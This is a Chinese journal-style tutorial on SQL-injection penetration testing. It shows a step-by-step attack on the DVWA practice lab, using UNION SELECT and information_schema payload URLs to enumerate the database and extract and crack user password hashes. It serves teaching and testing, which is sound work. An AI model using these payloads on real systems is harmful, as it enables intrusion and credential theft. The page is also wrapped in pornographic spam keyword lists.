999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

基于SQL注入漏洞的滲透測試技術研究

2018-04-15 16:14:25中興通訊股份有限公司張曉翠
電子世界 2018年14期
關鍵詞:數據庫用戶

中興通訊股份有限公司 張曉翠

一、前言

隨著網絡發展迅速,網絡覆蓋了人民生活的方方面面,個人及企業信息泄露事件頻頻發生,造成人身財產安隱患,由此引入的滲測試越來來越受到網絡維護人員的重視,在web漏洞中,SQL注入漏洞一直處于高泄露率,需要滲透測試人員在產品研發階段發現漏洞,并提交漏洞報告協助開發人員規避漏洞。

二、SQL注入漏洞簡介

SQL全稱是結構化查詢語言,SQL注入是一種將惡意的SQL代碼插入或添加到應用的輸入參數的攻擊,攻擊者探測出開發者編程過程中的漏洞,利用這些漏洞,巧妙的構造SQL語句,獲取到數據庫中的涉密信息,甚至對數據庫系統的內容進行直接檢索或修改。

凡是與數庫交互的位置都有可能產生SQL注入漏洞,數據庫分為很多種,有 oracle、 MYSQL、SQL Serve、DB2等,操作數據庫的語言即SQL語句,如果攻擊者能夠對與服務器交互的SQL語句進行修改,服務端沒有進行應有的過慮、校驗等,那么就造成了SQL注入漏洞,使攻擊者能獲得某些敏感信息。

三、SQL注入漏洞類型及挖掘方法

SQL注入漏洞可以分為如下兩種:數字型和字符型。

1.數字型SQL注入漏洞

當輸入的參數為整形時,如果存在SQL注入漏洞,則可以認為是數字型注入。例如SQL語句:Select * from tablename where id=1;那么語句 Select * from tablename where id=1 and 1=2應該是語句執行成功,但是查詢結果為空,因為1=2始終為假。而語句 Selcet *from tablename where id=1 and 1=1應該是語句執行成功,且查詢結果與原語句一致。

通過構造如上的輸入參數來判定是否存在數字型SQL注入漏洞。

2.字符型SQL注入漏洞

當輸入的參數為字符型時,如果存在SQL注入漏洞,則可以認為是字符型注入。例如SQL語句:Select * from tablename where username=’admin’;那么語句 Select * from tablename where username=’admin’ and 1=2應該是語句執行成功,但是查詢結果為空,因為1=2始終為假。而語句 Select * from tablename where username=’admin’ and 1=1應該是語句執行成功,且查詢結果與原語句一致。

通過構造如上的輸入參數來判定是否存在字符型SQL注入漏洞,注意對于字符型注入,通常都需要閉合字符串,需要注釋掉多余的代碼。

四、SQL注入漏洞利用

發現SQL注入漏洞后,可以利用SQL標準,查詢數據庫的敏感信息,常用語句如下:

1.order by語句,Select columnname1, columname2 from tablename where username=’admin’ order by paramindex,其中參數的序號,當注入的 paramindex超出查詢參數個數,則會返回失敗。

2.union select語句,聯合查詢語句要求 union內部的 select語句查詢的列數必須一致,同時每條 select語句中列的順序必須相同。由此我們可以用來猜測字段數,及查詢哪些字段可以用來暴敏感數據。

3.information_schema,在SQL注入中要獲取表格信息常用到這個數據庫視圖,類似與數據字典,提供了訪間數據庫元數據的方式,如數據庫名或表名,列類型,訪問權限等。其中常用的是informat ion _schema.tables和information_schema.columns。

五、SQL注入攻擊流程

1.發現注入漏洞;2.猜測字段數;3.査詢數據庫版本、當前用戶、系統用戶;4.獲取數據庫名;5.獲取數據庫表格,發現敏感表格;6.針對敏感表格數據進行原數據暴露。

六、SQL注入漏洞實戰講解

通過對于dvwa平臺的SQL注入漏洞進行攻擊演示。搭建dvwa漏洞平臺,進入SQL注入漏洞練習頁面。

1.發現SQL注入漏洞:http://xxx/vulnerabilities/sqli/?id=1and1=2&Submit=Submit#;

2.猜測字段數:

使用 order by方法:http://xxx/vulnerabilities/sqli/?id=1’ order by 2--+&Submit=Submit#;或者使用 union select方法:http://xxx/vulnerabilities/sqli/?id=1’ unionselect1, 2-- -&Submit= Submit#;發現字段數為2;

3.查詢數據庫版本,系統用戶,當前用戶:

http://xxx/vulnerabilities/sqli/?id=1’ unionselect version(),system_user()-- -&Submit =Submit#;

http://xxx/vulnerabilities/sqli/?id=1’ unionselect version(),current_user()-- -&Submit =Submit#;

發現數據庫版本為5.5.36-log;系統用戶為root@localhost;當前用戶為root@localhost;

4.獲取數據庫名長度:http://xxx/vulnerabilities/sq1i/?id=1’union select1, length(database())-- -&Submit=Submit#;獲取到數據庫名長度為4。

5.獲取數據庫名稱:http://xxx/vulnerabilities/sq1i/?id=1’ union select1, substring(database(),1,4)-- -&Submit=Submit#;對于有些對輸入參數進行了限制,可以使用 ascii函數來分別獲取每個字節:

http://xxx/vulnerabilities/sq1i/?id=1’ union select ascii(substring(database(),1,1)), ascii(substring(database(),2,1))-- -&Submit=Submit#;

http://xxx/vulnerabilities/sq1i/?id=1’ union select ascii(substring(database(),3,1)), ascii(substring(database(),4,1))-- -&Submit=Submit#;

獲取到ascii值第一位的是100,第二位是118,第三位是119,第四位是97;換算后為:dvwa。

6.獲取數據庫表格http://xxx/vulnerabilities/sqli/?id=1’ unionselect length(table_name), (table_name)frominformation_schema.tableswhere table_schema=database()-- -&Submit=Submit#;

從表格名稱發現可用敏感表格user;

7.獲取表格user的列名稱:

http://xxx/vulnerabilities/sqli/?id=1’ unionselect length(column_name),(column_name) from information_schema.column where table_schema=database() and table_name=’users’;-- --&Submit=Submit#;或者避免開雙引號可能引起語句閉合的影響,用十六進制來表示user:http://xxx/vulnerabilities/sqli/?id=1’unionselect length(column_name),(column_name) from information_schema.column where table_schema=database() and table_name=0x7573657273-- - -&Submit=Submit#;發現關鍵字password;

8.獲取密碼 :

http://xxx/vulnerabilities/sqli/?id=1’ unionselect first_name,password form users -- -&Submit#;觀察密碼是32位,猜測是md5加加密,用md5破解網址破解密碼。最終完成獲取5個用戶密碼,獲得了用戶敏感信息。

七、總結

本文通過對SQL注入漏洞類型及原理的講解,并對dvwa平臺進行SQL注入漏洞攻擊演示,對SQL注入漏洞滲透測試有指導意義。

猜你喜歡
數據庫用戶
數據庫
財經(2017年15期)2017-07-03 22:40:49
數據庫
財經(2017年2期)2017-03-10 14:35:35
關注用戶
商用汽車(2016年11期)2016-12-19 01:20:16
關注用戶
商用汽車(2016年6期)2016-06-29 09:18:54
數據庫
財經(2016年15期)2016-06-03 07:38:02
關注用戶
商用汽車(2016年4期)2016-05-09 01:23:12
數據庫
財經(2016年3期)2016-03-07 07:44:46
數據庫
財經(2016年6期)2016-02-24 07:41:51
Camera360:拍出5億用戶
創業家(2015年10期)2015-02-27 07:55:08
100萬用戶
創業家(2015年10期)2015-02-27 07:54:39
主站蜘蛛池模板: 在线色综合| 99热在线只有精品| 国产人人乐人人爱| 国产综合精品一区二区| 欧美在线伊人| 97精品国产高清久久久久蜜芽| 免费看一级毛片波多结衣| 欧美a在线视频| 亚洲综合九九| 国产在线自在拍91精品黑人| 女人毛片a级大学毛片免费| av一区二区三区高清久久| 成人毛片在线播放| 欧美成人一区午夜福利在线| 中文字幕免费视频| 婷婷色婷婷| 久久亚洲天堂| 六月婷婷综合| 亚洲视频a| 国内精自线i品一区202| 国产成人AV大片大片在线播放 | 一本大道无码日韩精品影视| 亚洲天堂成人| 色综合久久无码网| 欧美日韩精品综合在线一区| 中文字幕在线视频免费| 2019年国产精品自拍不卡| 人妻一本久道久久综合久久鬼色| 国产成人麻豆精品| 爽爽影院十八禁在线观看| 无码中字出轨中文人妻中文中| 欧美精品xx| 人妻少妇久久久久久97人妻| 国产精品太粉嫩高中在线观看| 久久这里只有精品23| 亚洲成人播放| 动漫精品啪啪一区二区三区| 一级毛片免费不卡在线视频| 国产欧美又粗又猛又爽老| 国产在线视频福利资源站| 日本亚洲欧美在线| 成人小视频在线观看免费| 国产黑丝一区| 91原创视频在线| 久久国产毛片| 欧美一级在线看| 香蕉久人久人青草青草| 欧美色视频网站| 欧美亚洲欧美| 91黄色在线观看| 99九九成人免费视频精品 | 97狠狠操| 最新国产精品第1页| 又黄又湿又爽的视频| 国产精品免费电影| 精品久久久久无码| 久久精品aⅴ无码中文字幕| 亚洲美女久久| 国产麻豆va精品视频| 一区二区三区国产精品视频| 人妻免费无码不卡视频| 婷五月综合| 国产H片无码不卡在线视频| 全裸无码专区| 国产激情无码一区二区免费| 成人免费网站久久久| 日韩欧美国产另类| 日韩第一页在线| 国产网站一区二区三区| 无码中文字幕乱码免费2| 欧美日韩动态图| 99热国产在线精品99| 午夜精品一区二区蜜桃| 欧美三级自拍| 无码中文AⅤ在线观看| 国产精品大白天新婚身材| 日韩AV无码免费一二三区| 国产成人高清精品免费5388| 亚洲国产无码有码| 欧美午夜小视频| 无码aaa视频| 中文字幕亚洲专区第19页|